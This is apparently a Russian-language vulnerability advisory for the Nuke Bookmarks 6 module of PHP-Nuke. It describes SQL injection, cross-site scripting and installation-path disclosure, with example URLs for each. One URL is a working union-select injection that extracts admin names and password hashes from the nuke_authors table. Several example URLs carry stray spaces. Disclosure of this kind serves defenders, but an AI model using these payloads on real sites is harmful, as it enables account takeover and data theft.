Программа: Nuke Bookmarks 6
Обнаруженная уязвимость позволяет
удаленному пользователю произвести XSS
нападение, получить данные об установочной
директории приложения и выполнить
произвольные SQL команды в базе данных
уязвимого приложения.
1. SQL-инъекция существует из-за
недостаточной фильтрации входных данных в
параметре category модуля marks. Удаленный
пользователь может с помощью специально
сформированного URL выполнить произвольные
SQL команды в базе данных уязвимого
приложения.
Пример:
http://[target]/modules.php?name=Bookmarks&file=marks&catname=1
&category=-1/**/union/**/select%200,aid,0,pwd, 0,0%20from%20nuke_authors
2. Межсайтовый скриптинг возможен из-за
недостаточной фильтрации HTML тегов.
Удаленный пользователь может создать
специально сформированный URL и выполнить
произвольный HTML сценарий в браузере жертвы
в контексте безопасности уязвимого сайта.
Пример:
http://[target]/modules.php?name=Bookmarks&file= del_cat&catname=[htmlco
de]
http://[target]/modules.php?name=Bookmarks&file= del_mark&markname=[htmlcode]
http://[target]/modules.php?name=Bookmarks&file= edit_cat&catname=[htmlcode]
http://[ta rget]/modules.php?name=Bookmarks&file= edit_cat&catcomment=[htmlcode]
http://[target]/modules.php?name=Bookmarks&file= marks&catname=[htmlcode]
http://[target]/modules.ph p?name=Bookmarks&file=
uploadbookmarks&category=[htmlcode]
3. Удаленный пользователь может получить
данные об установочной директории
приложения из-за недостаточной обработки
входных данных в некоторых параметрах
модуля marks.
Пример:
http://[target]/modules.php?name= Bookmarks&fil e=marks
http://[target]/modules.php?name= Bookmarks&file=marks&category=1\'